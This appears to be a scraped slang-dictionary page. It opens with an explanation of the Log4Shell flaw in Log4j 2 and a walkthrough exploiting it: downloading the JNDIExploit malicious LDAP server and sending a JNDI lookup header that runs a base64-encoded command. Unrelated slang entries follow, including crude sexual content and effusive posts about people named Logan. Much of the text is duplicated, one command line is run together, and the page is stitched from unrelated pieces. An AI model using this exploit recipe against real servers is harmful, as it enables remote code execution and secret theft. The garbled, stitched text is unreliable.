The Java Naming and Directory Interface (JNDI) allows for lookup of Java objects at program runtime given a path to their data. JNDI can leverage several directory interfaces, each providing a different scheme of looking up files. Among these interfaces is the Lightweight Directory Access Protocol (LDAP), a non-Java-specific protocol which retrieves the object data as a URL from an appropriate server, either local or anywhere on the Internet.
In the default configuration, when logging a string, Log4j 2 performs string substitution on expressions of the form ${prefix:name}. For example, Text: ${java:version} might be converted to Text: Java version 1.7.0_67. Among the recognized expressions is ${jndi:<lookup>}; by specifying the lookup to be through LDAP, an arbitrary URL may be queried and loaded as Java object data. ${jndi:ldap://example.com/file}, for example, will load data from that URL if connected to the Internet. By inputting a string that is logged, an attacker can load and execute malicious code hosted on a public URL. Even if execution of the data is disabled, an attacker can still retrieve data—such as secret environment variables—by placing them in the URL, in which they will be substituted and sent to the attacker's server. Besides LDAP, other potentially exploitable JNDI lookup protocols include its secure variant LDAPS, Java Remote Method Invocation (RMI), the Domain Name System (DNS), and the Internet Inter-ORB Protocol (IIOP).
In the default configuration, when logging a string, Log4j 2 performs string substitution on expressions of the form ${prefix:name}. For example, Text: ${java:version} might be converted to Text: Java version 1.7.0_67. Among the recognized expressions is ${jndi:<lookup>}; by specifying the lookup to be through LDAP, an arbitrary URL may be queried and loaded as Java object data. ${jndi:ldap://example.com/file}, for example, will load data from that URL if connected to the Internet. By inputting a string that is logged, an attacker can load and execute malicious code hosted on a public URL. Even if execution of the data is disabled, an attacker can still retrieve data—such as secret environment variables—by placing them in the URL, in which they will be substituted and sent to the attacker's server. Besides LDAP, other potentially exploitable JNDI lookup protocols include its secure variant LDAPS, Java Remote Method Invocation (RMI), the Domain Name System (DNS), and the Internet Inter-ORB Protocol (IIOP).
To execute commands with Log4Shell, I’ll be spinning up an LDAP server with the capabilities to exploit JNDI injection attacks written by feihong-cs. Run the following to download the malicious LDAP server:
cd /tmp
wget --quiet github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zipunzip JNDIExploit.v1.2.zip
With the ZIP archive decompressed, we can retrieve the programs help menu with the following command:
java -jar JNDIExploit-1.2-SNAPSHOT.jar -h
To start the malicious LDAP server on localhost:1389 (there will also be an HTTP server spun up on port 9001. Looking at the source code tells me that this is where the actual malicious Java class is being loaded from), run the following command:
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 127.0.0.1 -p 9001
And finally, to obtain our reverse shell, let’s base64 encode a echo command to write some data into a file in the /tmp folder (make sure to get rid of the + sign by adding extra spaces as needed):
echo -n 'echo "you have been pwned" > /tmp/note.txt' | base64 -w 0
And then make the following request to the vulnerable application:
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://127.0.0.1:1389/Basic/Command/Base64/ZWNobyAieW91IGhhdmUgYmVlbiBwd25lZCIgPiAvdG1wL25vdGUudHh0}'
We can then confirm that the command was executed by going into the container with docker exec -it log4shell-app sh and then confirm that the file note.txt was created in the /tmp folder:
cd /tmp
wget --quiet github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zipunzip JNDIExploit.v1.2.zip
With the ZIP archive decompressed, we can retrieve the programs help menu with the following command:
java -jar JNDIExploit-1.2-SNAPSHOT.jar -h
To start the malicious LDAP server on localhost:1389 (there will also be an HTTP server spun up on port 9001. Looking at the source code tells me that this is where the actual malicious Java class is being loaded from), run the following command:
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 127.0.0.1 -p 9001
And finally, to obtain our reverse shell, let’s base64 encode a echo command to write some data into a file in the /tmp folder (make sure to get rid of the + sign by adding extra spaces as needed):
echo -n 'echo "you have been pwned" > /tmp/note.txt' | base64 -w 0
And then make the following request to the vulnerable application:
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://127.0.0.1:1389/Basic/Command/Base64/ZWNobyAieW91IGhhdmUgYmVlbiBwd25lZCIgPiAvdG1wL25vdGUudHh0}'
We can then confirm that the command was executed by going into the container with docker exec -it log4shell-app sh and then confirm that the file note.txt was created in the /tmp folder:
by Bad C dev December 15, 2021
Get the Log4Shell mug.(li-ga- sho-o)
The act of mentally or physically harming someone after they try to get you with a "ligma" joke
The act of mentally or physically harming someone after they try to get you with a "ligma" joke
guy 1: hey bro, have you heard of ligma?
guy 2: no bro but didnt you lick your grandpa's balls last night
guy 1: how the fuck do you know that-
guy 2: ligashoo... bitch.
guy 2: no bro but didnt you lick your grandpa's balls last night
guy 1: how the fuck do you know that-
guy 2: ligashoo... bitch.
by JackHorseFeather February 12, 2022
Get the ligashoo mug.Related Words
by Lil Coohie clencher April 7, 2022
Get the Logan Kramer's ass mug.by andyrodwill April 8, 2022
Get the logansvoid mug.He will sure as heck stand for the flag and stand for the cross
Lmao wahat a loser, jk the exact opposite
Lmao wahat a loser, jk the exact opposite
by JoshuaNetfold May 1, 2022
Get the Logan Walter white mug.Logan Roy is one of the best people you will ever meet. He may seem mean and scary but once you know him you grow to love him. He is super hot and soon you will fall head over heels for him. Trust me, Logan is the way to go.
by TheBestAccount October 25, 2022
Get the Logan Roy mug.Logan is a sharp individual, and can easilly read inbetween the lines.
Logan is adamant, and can fend for himself
Logan is smart, and hardheaded
Logan does'nt open up to people easily, because he's aware of how people can be
Logan is wise, because he got hurt a lot..
Logan can be agile too..
Logan is fragile inside
Logan just wants to be loved and accepted...he does'nt want or expect anything more than that
Logan is a peculiar boy
Logan loves Hardstyle music.. And nightcore
Logan is the realest person i've ever met
Logan is so beautiful, i never want to stop looking at him
Logan also makes me feel different, in an unexplainable way
Logan drives me crazy but
Logan also makes me happy. Not because Logan did a singular specific thing... But solely because
Logan is Logan, and
Logan loves me
Logan is adamant, and can fend for himself
Logan is smart, and hardheaded
Logan does'nt open up to people easily, because he's aware of how people can be
Logan is wise, because he got hurt a lot..
Logan can be agile too..
Logan is fragile inside
Logan just wants to be loved and accepted...he does'nt want or expect anything more than that
Logan is a peculiar boy
Logan loves Hardstyle music.. And nightcore
Logan is the realest person i've ever met
Logan is so beautiful, i never want to stop looking at him
Logan also makes me feel different, in an unexplainable way
Logan drives me crazy but
Logan also makes me happy. Not because Logan did a singular specific thing... But solely because
Logan is Logan, and
Logan loves me
by Firstblood January 8, 2023
Get the Logananan mug.